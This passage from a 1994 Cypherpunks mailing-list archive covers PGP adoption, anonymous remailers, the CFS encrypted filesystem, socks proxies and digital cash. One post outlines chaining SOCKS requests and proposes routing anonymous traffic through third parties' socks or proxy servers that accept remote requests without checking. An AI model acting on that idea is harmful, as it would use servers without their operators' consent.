1994 14:47:34 -0700 Andrew Currie wrote: >Cyberspace Development, Inc. (CSD) has an immediate opening >for an experienced C/C++, UNIX, TCP/IP software developer to >join our TIA product development team. Responsibilities will >include design & development of new features, customization, >optimization, porting to new platforms, and maintenance. >This developer will also be involved in future CSD products >and online services beyond TIA. > >TIA, or The Internet Adapter (tm), is a commercial software product >sold over the Internet that emulates a SLIP (and soon PPP) connection >on a standard Internet shell account. (For complete info on TIA >and more info on CSD please visit our site at http://marketplace.com/ >or send email to tia-info at marketplace.com.) > >Technical Skill Requirements >---------------------------- >* Excellent C and C++ programming skills >* Experience with TCP/IP programming >* Experience with serial communications programming >* Detailed knowledge of PPP >* Development experience with several UNIX environments >* Deep knowledge, wide experience, and interest in Internet technology > >Other Requirements >------------------ >* Strong commitment to customer satisfaction >* Flexible & adaptable; with a proven ability to learn quickly >* Willing to take responsibility & "ownership" of a problem till solved >* Self-starter with strong work ethics (dependable) >* Team Player - enjoy working in concert w/sales, marketing & tech support >* Provide your own office with phone, machine, & Net connection > >Definite Plus: >--------------- >* Already aware of, understand, (and use) TIA daily >* Located in or near Boulder, CO or Seattle, WA >* Previous experience with commercial product development >* Experience in the online services industry or another start-up >* SQL and relational or object-oriented DBMS experience >* PERL, csh, CGI, or HTML scripting experience >* Add'l experience with one or more: Mac, Windows, DOS, VMS development > >Compensation >------------ >* Negotiable depending on education, work experience, and "fit". >* Developer will start as a contractor so we both have a "dating period". >* We are open to profit-sharing as part of the compensation package > >Schedule >-------- >* Start immediately (or by 1/31/95 at the latest) > >If this opportunity sounds like a match with your skills & interests >then please send the following info in ASCII format: > >o Detailed response to each bullet item above (with examples please) >o Current resume >o 3 recent references relevant to both technical skills & work style >o The compensation you suggest >o Earliest date you could start >o Any questions/issues you have > >as soon as possible to: Opportunity at MarketPlace.com > >Thank you for your time and attention. Please forward this post to >other relevant mailing lists, newsgroups, or folks who may be interested. > >======================================================================== >Cyberspace Development, Inc. Makers of TIA - The Internet Adapter (tm) >======================================================================== > > > ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= From dave at esi.COM.AU Tue Dec 20 21:05:56 1994 From: dave at esi.COM.AU (Dave Horsfall) Date: Tue, 20 Dec 94 21:05:56 PST Subject: GUI: PGP vs novices In-Reply-To: Message-ID: On Tue, 20 Dec 1994, Dave Del Torto relayed to us: > I'd estimate that _maybe_ 10 of the roughly 250+ people I've spent quality > time explaining PGP to are still using it. Egad. I suppose I shouldn't feel too annoyed that out of over fifty copies of PGP (from the 2.3A days) I've distributed (at my own expense) to radio amateurs in Australia (for authentication on packet radio), with two lectures and an article in a national magazine, and exhortations to call me about any problems, precisely two other people are using it (but are not signing their messages); and these were already crypto-aware to start with - sigh... I'm not going to give up - at least my signature is generating enquiries. -- Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6 Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD From hfinney at shell.portal.com Tue Dec 20 21:10:59 1994 From: hfinney at shell.portal.com (Hal) Date: Tue, 20 Dec 94 21:10:59 PST Subject: Guerrilla remailers revisited In-Reply-To: <1NpzkKjqR4IK075yn@skypoint.com> Message-ID: <199412210509.VAA03004@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- skaplin at skypoint.com (Samuel Kaplin) writes: >As we have found out, the freenets use an interface called "FREEPORT." To >myself and many others this software is a mystery. I am wondering if it is >possible to call procmail via a .forward file under Freeport. If this is >possible, why couldn't someone write a .procmailrc file to sanitize the >headers. If this was written properly, all you should have to do is drop >procmail, the .procmailrc file and the .forward file in place and the >remailer is up and running. I tried out a freenet system once. You could not create files with arbitrary contents. There was a facility for setting up mail forwarding, but it was all done via a menu-driven system where you specified the email address to which your mail should be forwarded. The system really did not seem to have enough flexibility for procmail. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLve4WRnMLJtOy9MBAQH7KwIAw0ttRN3/AJRtIhAnPrt88XF6qtlx5kBR iORzonUhCe4tvSpLaOv6AREUiVJLkerFn3KWUHgXZ+IVAS9LSPUy8g== =NCgJ -----END PGP SIGNATURE----- From hacsc218 at huey.csun.edu Tue Dec 20 21:34:32 1994 From: hacsc218 at huey.csun.edu (hacsc218 at huey.csun.edu) Date: Tue, 20 Dec 94 21:34:32 PST Subject: Intel to recall Pentiums Message-ID: Silicon Valley, CA- Intel Corporation announced today their plans to exchange up to several million defective Pentium microprocessors. The chips, widely used in personal computers, have a flaw which causes them to make calculating errors. Although the problem affects only certain types of applications, Pentium owners have demanded a recall. Asked what the company intended to do with the returned chips, a high-ranking Intel official, speaking on condition of anonymity, would say only, "let's just say we found a good home for them." On an unrelated note, the National Security Agency today announced plans for a major expansion of their Fort Meade headquarters... Mike From jpp at markv.com Tue Dec 20 22:19:25 1994 From: jpp at markv.com (jpp at markv.com) Date: Tue, 20 Dec 94 22:19:25 PST Subject: International Sports Book Message-ID: <9412202216.aa26294@hermix.markv.com> "Bag Your Bookie..." begins the add for "the world's largest legalized International Sports Book". With the optional ATM card, you can access your winnings within 48 hours of the event, at any ATM. Another example of the strength of "speed bumps" on the internet. Can the Internet Casino be far behind? Does anyone want to pitch digital cash to these folks? Does anyone want to make some bucks setting these folks up on the net? (How big do you think the market is for a internet sports book?) For further information you can "Enroll right now! Call 1-809-462-2279 and talk to one of our sports agents..." 24/7 I assume. j' P.S. It would cost me (US dollars) 1.41(connect charge) + 2.50(calling card) for the first minute, and 0.97 for each additional minute for me to call these folks (located in Saint John's Antillees (sp!?)) from here in Encino, California at 1940 monday via the MCI network. From jburrell at crl.com Tue Dec 20 23:25:03 1994 From: jburrell at crl.com (Jason Burrell) Date: Tue, 20 Dec 94 23:25:03 PST Subject: Cryptographic filesystem for Linux? Message-ID: <199412210728.CAA14366@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Is there an encrypted filesystem for Linux out there? I'm speaking of something like Secure File System(DOS), but for Linux. The kernel in question is 1.1.59, soon to be upgraded to a later version. IDE drive, ex2fs formatted file system. Regards. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvfY9SoZzwIn1bdtAQHZFAGA3n8SRWBHKm74hkZjm1hFuZ1EFzcXiD78 lRYe4j/RHaxORSM3tHjC/lrt3v9xTF8a =KAWT -----END PGP SIGNATURE----- From strick at versant.com Wed Dec 21 00:07:57 1994 From: strick at versant.com (strick -- henry strickland) Date: Wed, 21 Dec 94 00:07:57 PST Subject: Cryptographic filesystem for Linux? In-Reply-To: <199412210728.CAA14366@bb.hks.net> Message-ID: <199412210807.AAA05754@gwarn.versant.com> -----BEGIN PGP SIGNED MESSAGE----- THUS SPAKE Jason Burrell : # -----BEGIN PGP PSEUDO-SIGNED MESSAGE----- # # Is there an encrypted filesystem for Linux out there? I'm speaking of # something like Secure File System(DOS), but for Linux. The kernel in # question is 1.1.59, soon to be upgraded to a later version. IDE drive, # ex2fs formatted file system. I've thought about porting Matt Blaze's "cfs" to linux. For several reasons: -- because I trust his practical crypto ability more than mine or most anyone else's -- because it runs in user-level code rather than in the kernel -- making both installation and development much easier -- because it's had some serious usage and refinement Q: What is it in the "cfs" code that makes it BSD-specific? How much work would it be to overcome that? thx, strick -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBLvfhzwq3IMgMJUNlAQFXdwH/ZNmZx+sK14Qv/ZxHMbGPXDYbxmex0Dz6 X0RB3yuidJlgKUo0OjP1oWtncDDNBa8kwt6Agt9IHQ6sMHepZkmz9A== =SBNL -----END PGP SIGNATURE----- From skaplin at skypoint.com Wed Dec 21 00:41:36 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Wed, 21 Dec 94 00:41:36 PST Subject: Remailer list needed Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Does anyone have a current listing of all the remailers? If so could you please send it to me as I would like to put it up on the auto-responder. Thanks, Sam ============================================================================== We love your adherence to democratic principles. - George Bush speaking to Ferdinand Marcos, June 1981 ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: This message digitally signed to verify the identity of the sender iQEVAwUBLvfooMlnXxBRSgfNAQGLlQf/TzjZCzrZhMYWgs7XqGeV9+35XXmrjy+f jqVseykiY3n3iEVDALIJobRCPATS962N1k2EinVHea0dKt+F6NA4xsrGStFdoneT bVeoPwSgXGqghVyy88gRwiSHHFincIztHnV4A/r59B/Nz/4hawmYD0vo9SZeHhrv ruBhWSJH6Cw/4Xh+17PgreLfpLCILFF0EFmXiiXrZ5dSsQZJ2aOD5LqN0TTbdxyN uakm0WPao1WTCx2yT+SiLLex55lTzHrgfvP/gINwDbUA1TUl64OEYGsjxyl7gHWw mCQrLFX0XxvAunB223aTBYNiGDyhy9P8BCN3yf95yYkxoCzq4pre6w== =YR7W -----END PGP SIGNATURE----- From skaplin at skypoint.com Wed Dec 21 00:41:59 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Wed, 21 Dec 94 00:41:59 PST Subject: Why I do what I do. Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I had a very telling conversation with my wife today. I was working on some procmail stuff while she thought I should be doing something else. After about a ten minute diatribe, she said "I don't know why you spend all that time messing around with that crypto stuff. What point does it have?" I responded, "Do you remember when you were a little girl, and you told your best friend a secret?" She replied with a testy "YES." "All I'm trying to do is make sure our children will be able to do the same, because with all the developments lately this may not be possible." After about ten minutes of silence, I got a very soft "I understand." The reason I have brought this conversation up is to make a point. You can have the best technology around, but if people can't relate to the general concepts involved as it relates to them, the war is lost. Sam ============================================================================== Television is the first truly democratic culture - the first culture available to everybody and entirely governed by what the people want. The most terrifying thing is what people do want. - Clive Barnes, in "New York Times", 1969 ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: This message digitally signed to verify the identity of the sender iQEVAwUBLvfouslnXxBRSgfNAQGMOgf9Er7usAgpi1H9PgTDQ6Sp6wvy3F9KL5Ly 8SxYO8wkIybIWcLTjuvC18MUQNe9dUTpLqSmjOsZqxIFvlkLna0HEwyO5d53Vta6 1yhLByTWoEiBuP2xfnSDWG19/uEivOGyZdlTjtJ0w6aquDlGepkGuWUFGEuhY0ee +45NjzSoCluQhn5elzA79bNvp4OkQMnbCdzk6ZXD6uO1w0iGXyEKRd8V9TXig5Ir 2QXbZDqayW2B6TJP7m+kyPgdJAOxJia3LLZe0icBW7Et9jdys0lolAIGfHHe9LLL dRMQnstSfxcvzDrhxEmZze/Jj9uP2S6WY3fKANO9IwwAugxrp92R8Q== =Iyk6 -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Wed Dec 21 00:43:00 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Wed, 21 Dec 94 00:43:00 PST Subject: CFS for Linux Message-ID: <199412210848.DAA15018@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- FYI: Forwarded message: > To: cypherpunks at toad.com > Subject: New version (1.2) of CFS now available > Date: Fri, 02 Dec 94 18:05:00 -0500 > From: Matt Blaze > > Source code for the latest version of CFS (release 1.2), the Cryptographic > File System, is now available upon request for research and experimental > use in the US and Canada. [...] > The software was developed under > SunOS and BSDI, and there are also unsupported user-contributed ports > available for AIX, HP/UX, Irix, Linux, Solaris and Ultrix. We really > can't promise to provide any technical support at all, beyond the > source code itself. We also maintain a mailing list for CFS users and > developers; subscription information is included with the source code. [...] > * Copyright (c) 1992, 1993, 1994 by AT&T. > * Permission to use, copy, and modify this software without fee > * is hereby granted, provided that this entire notice is included in > * all copies of any software which is or includes a copy or > * modification of this software and in all copies of the supporting > * documentation for such software. > * > * This software is subject to United States export controls. You may > * not export it, in whole or in part, or cause or allow such export, > * through act or omission, without prior authorization from the United > * States government and written permission from AT&T. In particular, > * you may not make any part of this software available for general or > * unrestricted distribution to others, nor may you disclose this software > * to persons other than citizens and permanent residents of the United > * States and Canada. > * > * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED > * WARRANTY. IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY > * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY > * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE. > > If you would like a copy of the CFS source code, please send email to: > > cfs at research.att.com > > DO NOT REPLY DIRECTLY TO THE SENDER OF MESSAGE. You must include a > statement that you are in the US or Canada, are a citizen or legal > permanent resident of the US or Canada, and have read and understand > the license conditions stated above. Also include an email address in > a US or Canada-registered domain. The code will be sent to you via > email in a uuencoded compressed tarfile. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvfrsSoZzwIn1bdtAQHvcwGAn9qkYDbPDazGCM9Pg/8CDyTAgxm10Nj2 LB/Ek/NnzOTG8ywki0CEbF8B9ei2pxWH =bPdS -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Wed Dec 21 02:08:01 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Wed, 21 Dec 94 02:08:01 PST Subject: Remailer list needed Message-ID: <199412211013.FAA15701@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- > Does anyone have a current listing of all the remailers? If so could you > please send it to me as I would like to put it up on the auto-responder. This seems to be the most popular question on c'punks lately. Raph posts his list periodically (weekly ?), but perhaps he should move it to every other day or daily. I think it would be worth posting more frequently here. I never tire of answering this one, though.... :) Anyway, the standard ways of accessing the latest list are: finger remailer-list at kiwi.cs.berkeley.edu http://www.cs.berkeley.edu/~raph/remailer-list.html I don't know of a way to get it automatically via mail. Since, short of Web access, Internet mail access is a necessary condition for using a remailer, I've been meaning to hack something together for Raph to handle this lowest- common-denominator means of access. So I think it would be great to see you set it up for autoreply, Sam, if you can hook it in to the source for regular updates. The list (from finger) as of just after I typed this follows: $remailer{"vox"} = " cpunk pgp. post"; $remailer{"avox"} = " cpunk pgp post"; $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"rebma"} = " cpunk pgp hash"; $remailer{"jpunix"} = " cpunk pgp hash latent cut post ek"; $remailer{"c2"} = " eric pgp hash"; $remailer{"soda"} = " eric post"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub"; $remailer{"usura"} = " cpunk pgp. hash latent cut post"; $remailer{"desert"} = " cpunk pgp. post"; $remailer{"nately"} = " cpunk pgp hash latent cut"; $remailer{"xs4all"} = " cpunk pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk pgp hash latent cut post ek" ; $remailer{"rahul"} = " cpunk"; $remailer{"mix"} = " cpunk hash latent cut ek"; $remailer{"q"} = " cpunk hash latent cut ek"; catalyst at netcom.com is _not_ a remailer. Last ping: Wed 21 Dec 94 2:00:01 PST remailer email address history latency uptime - - ----------------------------------------------------------------------- usura usura at replay.com **++*+*****# 6:59 99.99% alumni hal at alumni.caltech.edu *****+*****# 4:05 99.99% nately remailer at nately.ucsd.edu ++++.+++++++ 1:08:49 99.99% penet anon at anon.penet.fi ***+*+****** 32:46 99.99% portal hfinney at shell.portal.com ***********# 2:13 99.99% c2 remail at c2.org +-+++++-++ + 39:26 99.99% ideath remailer at ideath.goldenbear.com *++**+****** 9:35 99.98% bsu-cs nowhere at bsu-cs.bsu.edu *++********# 4:43 99.97% mix mixmaster at nately.ucsd.edu +++*.++++++- 1:17:13 99.97% vox remail at vox.xs4all.nl ..-----...-+ 15:20:51 99.99% q q at c2.org *-+--++- 3:46:16 99.88% rahul homer at rahul.net **** ****--# 27:49 99.67% soda remailer at csua.berkeley.edu .......... 9:50:58 99.61% desert remail at desert.xs4all.nl -------.-. 16:26:44 99.99% xs4all remailer at xs4all.nl **+ +**** # 7:14 99.41% flame tomaz at flame.sinet.org *+-++**+* +* 8:51 98.09% jpunix remailer at jpunix.com +-++**+* +# 8:25 97.96% rebma remailer at rebma.mn.org --___..-.--+ 21:50:14 90.15% extropia remail at extropia.wimsey.com -+ 5:00:06 17.69% -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvf9+Gf7YYibNzjpAQF+FwQAiqHC78uctkIG5vX+YF+H/EN8RodOLt6s EZjJW3BGbFitC20++3MfPJ2wUVFXLcNxUpXY1gEcbxMttNPaMayK4VrKNWFzZ7BT p1iKeb82Im+GYyL0EHvhtS8eDiyuPAyBSibQYjPppY/wfl5qW70FpxJ6hWc/4Avf twIJ5XYXFcU= =MO7e - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvf/oSoZzwIn1bdtAQE+jwF/RcW6oTb23KEqrgDUfVeB0p6KMPGaL6hF 5/I3/BqjqvAY0FrsHkdPTTvI9LDNjyOc =YjJG -----END PGP SIGNATURE----- From perry at imsi.com Wed Dec 21 07:11:38 1994 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 21 Dec 94 07:11:38 PST Subject: Cryptographic filesystem for Linux? In-Reply-To: <199412210728.CAA14366@bb.hks.net> Message-ID: <9412211510.AA11964@snark.imsi.com> Jason Burrell says: > Is there an encrypted filesystem for Linux out there? I'm speaking of > something like Secure File System(DOS), but for Linux. The kernel in > question is 1.1.59, soon to be upgraded to a later version. IDE drive, > ex2fs formatted file system. Matt Blaze's CFS should port to any system where NFS works... .pm From hfinney at shell.portal.com Wed Dec 21 08:10:40 1994 From: hfinney at shell.portal.com (Hal) Date: Wed, 21 Dec 94 08:10:40 PST Subject: No privacy with DigiCash In-Reply-To: <199412210316.WAA00684@orchard.medford.ma.us> Message-ID: <199412211609.IAA11143@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- Bill Sommerfeld writes, quoting me: >> Is there something I am overlooking, some way to buy things >> privately with DigiCash? >Yes... at least one TCP/IP proxy system (socks) lets the client >receive incoming connections (the client makes a second connection to >the socks server, and the socks server informs it of the addr/port >that it's listening on; when a connection comes in to that port, the >two incoming connections are gatewayed to each other); that's how >socksified FTP works, by the way. I read about socks last night, and while it has some nice features I don't know if it is suitable for a process which you want to have persist and be able to accept connections on an ongoing basis. With socks, the ecash process would tell the socks server to open a listening socket on its behalf. Then when a connection comes in from a merchant, it gets forwarded to the ecash process. This is the problem: the socks server probably cannot generally get the same port number as the ecash process. I don't know if it even tries. So you have to note the port number. Well, you have to do this already because the ecash process may not get the port number it wants if somebody else already has it. But, with socks you only get one incoming connection and then the socks server closes. The ecash process would have to request another listening socket each time it got a connection. And each of those could have a different port number. So this would be a constantly changing bit of information that you would have to keep in mind. If the ecash process were integrated with the web client, this would not be so bad, as the new port number could be supplied to the merchant server automatically. But with the current implementation this would have to be done manually. I was thinking of a socks-like model where you could have persistent servers running behind a socks firewall. The socks implementation is really designed for ftp transfers, where the ftp server has to make a connection back to the ftp client, and these are pretty transient. For a persistent server you would need a more complex structure. Probably there should be a persistent connection between your process and the socks server, separate from a listening socket that your process sets up. When a new connection comes in to the socks server for your machine, it does a connection of its own to your listening socket. Then there could be multiple connections to your server active at one time. The persistent connection would just be a "lifeline" so that if your server exited then the socks server would know to close down the proxy socket it holds for you. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLvhTBRnMLJtOy9MBAQHSCAH8DEC7mPaFDNSRQ6bV5TMs75pRrYd6M7x5 4xlVpVq/K3jKm76wAhJVZou6Vx6lGCHwwwYb3kU0CeE33SkPyzHJrA== =ILoI -----END PGP SIGNATURE----- From hfinney at shell.portal.com Wed Dec 21 08:28:16 1994 From: hfinney at shell.portal.com (Hal) Date: Wed, 21 Dec 94 08:28:16 PST Subject: c'punks top 5 In-Reply-To: <9412202053.AA10926@snark.imsi.com> Message-ID: <199412211627.IAA12525@jobe.shell.portal.com> "Perry E. Metzger" writes: >I'd say run socks or something similar; its a generalized port >proxying facility for firewalls, but it should work fine for this. I was reading about socks last night, and it does seem to be very close to what is needed for this. In fact, if you sat down to write a TCP connection redirector protocol for anonymous connections, socks is pretty close to what you would come up with. Socks V5 even has some encryption specified for it, although it has the deficiency that the "forwarding" connection address is sent in the clear. The basis idea of socks is very simple. A socks server runs on port 1080 on a gateway machine. If you want to make a connection through the server, connect to it on port 1080, then send a 1-byte version number, 4, a 1-byte request code, 1, the 2-byte port number you want to connect to, the 4-byte IP address you want to connect to, and then a null-terminated string which is supposed to be your user name (to help the server decide whether to allow the connection). It returns an 8-byte response message: 1 byte of version number, 4, 1 byte of result, where 0x5a means success, 2 bytes of outgoing port number and 4 bytes of server IP address. From then on, assuming success, it just forwards messages and you can talk directly to the remote machine. This lends itself nicely to chaining; simply make a socks request to the first machine, requesting it to connect to another socks machine; then send another socks request which will be interpreted by the 2nd machine, etc. You could build up chains of any size in this way, even responding dynamically to failed or refused connections. In fact, as with the CERN httpd proxy server, where existing implementations might actually be useful already for laundering web connections, it is possible that some socks implementations could be used as well. If the socks server did not check that requests came from the local site (as the httpd proxy server sometimes does not), then you could set your client to make socks connections to such a server and get anonymous web connections already. This also would mean that it might be politically easier to run a socks server than to run an anarchistic http redirector. Socks is pretty well understood by security-conscious network people so might appear to be less of a threat. Plus, if it does turn out that existing socks servers are useful for this purpose then this is something we could start using right away. Does anybody know of any sites running socks servers? I would like to experiment with whether they would accept connections and requests from remote sites. Thanks - Hal P.S. I found information about socks by searching the Internet Drafts archive at ISI. This California server is a mirror of the main one in Virginia, but is http based so is faster. Use URL http://info.internet.isi.edu/in-drafts, select "Locate internet drafts by file name", and then do a keyword search for socks. There are 3 of them, V4, V5, and one about using pem for encryption. From duncan at hasp.com Wed Dec 21 09:05:03 1994 From: duncan at hasp.com (Duncan J Watson) Date: Wed, 21 Dec 94 09:05:03 PST Subject: Remailer list supplied In-Reply-To: <199412211013.FAA15701@bb.hks.net> Message-ID: As per your request I just set up a mail robot that provides the remailer-list via email. It is slaved to the finger list at berkeley and gets updated from it once daily. To try it send email to remailer-list at remailer.hasp.com If mail to remailer.hasp.com bounces try speedbumps.hasp.com my changes to DNS may not have propagated out to the world yet. If you reference this server please use the address remailer-list at remailer.hasp.com since speedbumps.hasp.com may not always be the host supplying this service. If you have any questions or comments about this service just email me a message. djw On Wed, 21 Dec 1994, L. McCarthy wrote: > > I don't know of a way to get it automatically via mail. Since, short of Web > access, Internet mail access is a necessary condition for using a remailer, > I've been meaning to hack something together for Raph to handle this lowest- > common-denominator means of access. So I think it would be great to see you > set it up for autoreply, Sam, if you can hook it in to the source for regular > updates. > ------------------------------ Duncan J Watson Email: Duncan at HASP.COM Technical Support/Development ph#: +1 212 564 5678 Aladdin Software Security, Inc. fax#:+1 212 564 3377 From bass at fc.net Wed Dec 21 09:26:16 1994 From: bass at fc.net (Bass Wastelan) Date: Wed, 21 Dec 94 09:26:16 PST Subject: anon-HTTP server w/o root access In-Reply-To: <199412210047.TAA10557@bb.hks.net> Message-ID: <199412211728.LAA01434@freeside.fc.net> > someone writes: > $ an anon-http proxy server would probably consume much more in > $ the way of network resources than a remailer, which will > $ likely lead to many being shutdown once discovered by the sysadmins > > That might be somewhat less true on a commercial provider than on an > educational or corporate provider, but in any case a WWW anon-server would be > seen as a much larger potential security hole than a remailer. A couple of > months ago a "friendly" outsider gained unauthorized access to user files > here via our Web server, and reported it to the sysadmins. I would have been > mighty nervous if I'd been offering anon WWW access to the world. I'd be happy to setup a machine at my providers site do run a test of anonymized httpd. From what I understand they wouldn't mind helping either. Within the next 6 months, there probably will be a number of for pay anonymizer services availible on the net. It just makes too much sense for it to not happen. From tedwards at src.umd.edu Wed Dec 21 09:46:30 1994 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Wed, 21 Dec 94 09:46:30 PST Subject: GUI: PGP vs novices In-Reply-To: Message-ID: On Wed, 21 Dec 1994, Dave Horsfall wrote: > On Tue, 20 Dec 1994, Dave Del Torto relayed to us: > Egad. I suppose I shouldn't feel too annoyed that out of over fifty > copies of PGP (from the 2.3A days) I've distributed (at my own expense) > to radio amateurs in Australia (for authentication on packet radio), > with two lectures and an article in a national magazine, and > exhortations to call me about any problems, precisely two other people > are using it (but are not signing their messages); and these were > already crypto-aware to start with - sigh... PGP has made me more crypto aware, but at this point neither I nor most of the crypto aware people I personally know feel there is a need to either encrypt or sign messages on a regular basis. While this doesn't do great things for supporting crypto, it is simply reality. DigiCash is a different situation of course - it is needed, and as soon as possible. -Thomas From eric at remailer.net Wed Dec 21 10:21:01 1994 From: eric at remailer.net (Eric Hughes) Date: Wed, 21 Dec 94 10:21:01 PST Subject: properties of FV In-Reply-To: Message-ID: <199412211917.LAA17106@largo.remailer.net> From: Nathaniel Borenstein The work involved in adding optional cryptography is much more than you might think, particularly because of our internal security architecture. Basically, without going into a lot of details, the FV crypto-engine would have to live on the non-Internet machines that are not in our direct control, and this would enormously complicate the limited (batch!) communication we facilitate between the Internet and non-Internet machines. The perceived need for crypto "below the line" comes from the viewpoint that the system needs to be completely secure because crypto failures must be prevented at all cost. Rubbish. The subsequent claim that you couldn't possibly put crypto on the Unix boxes which are in your control is therefore also bogus. Let's assume that FV were to have a customer agreement that did not contain an implied warrantee of identity for a digital signature. Therefore if the crypto gets hacked it's just as if the email system gets hacked. Therefore keeping public keys (we're not talking about FV actually signing anything) above the line on a Unix box is no different than trusting the mailer on that same Unix box. I really don't believe FV would have to put crypto on EDS equipment. The crypto option is one we're very interested in adding eventually, but at this point it would be a major strain on our resources. I think you are far overestimating what it would take. Moreover, frankly, if we did it, that would only serve to mix our message in many peoples' perception. It's hard enough explaining to reporters that "we've discovered that crypto isn't needed for commerce." Their chance of understanding our message would NOT be enhanced if we then added "but we're providing crypto as an option anyway." The message that it's "not necessary for commerce" is reactionary to the assertation that it is necessary. By positioning FV in an adversarial role with respect to cryptography, you'll have the same problem no matter when you introduce crypto. I personally think you'll have a harder time changing your position later, after more people have been exposed to FV's current position. A much better public position is that "you can do commerce with or without crypto", which asserts independence rather than negation. These two public positions are _not_ identical; they are similar, but don't be fooled by some positivist notion of denotation into thinking that they're the same. Eric From bshantz at spry.com Wed Dec 21 10:37:18 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Wed, 21 Dec 94 10:37:18 PST Subject: GUI: PGP vs novices Message-ID: <199412211837.KAA09590@homer.spry.com> Thomas Grant Edwards Writes: >PGP has made me more crypto aware, but at this point neither I nor most of >the crypto aware people I personally know feel there is a need to either >encrypt or sign messages on a regular basis. It is my own personal opinion that in order for crypto to truly become mainframe, the software manufacturers of internet connectivity packages must integrate crypto into the applications. Look at the past threads here on Cypherpunks..."How do I write a script to put PGP into ELM?" "PGP DLL modularity" etc. In order to bring crypto to the masses, we have got to convince people that it is necessary. We also must make it "second nature". It sure is nice to have a menu option or a toolbar button that will encrypt plaintext automatically. Key management and some of the "high tech" (I know, for us it's nothing, but for my dad who just bought a computer and doesn't understand the difference between click, double click, and drag, crypto is a really high tech thing just in itself.) things of crypto should not be directly handled by the user. (Optional of course. On a privacy level, the user should have full control. But give the user a break...if the software is secure..as such...so is the user's privacy.) You will notice that this message is not signed. That's because in order to sign it, I would need to save my message, hop out to a DOS box, PGP encrypt it, hop back to my mail program and insert the encrypted mail as a text file. That's enough to discourage the average user. This is pretty much what Tim May was talking about when he discussed why he doesn't sign his messages. It's not that he couldn't... it's just not practical for him. It's not really practical for me either, but I do it when I feel it's necessary. The only way to make crypto practical is to basicalloy hide the technical side from the user and make it easy. That's my two cents. >>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<< Brad Shantz bshantz at spry.com Senior Software Engineer SPRY Inc. Direct #: (206)-442-8251 316 Occidental Ave. S. Main #: (206)-447-0300 Suite 316 Fax #: (206)-447-9008 Seattle, WA 98104 WWW URL: http://WWW.SPRY.COM ---------------------------------------------------------------------- PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< From rsalz at osf.org Wed Dec 21 10:37:37 1994 From: rsalz at osf.org (Rich Salz) Date: Wed, 21 Dec 94 10:37:37 PST Subject: c'punks top 5 Message-ID: <9412211832.AA08198@sulphur.osf.org> > I was reading about socks last night, and it does 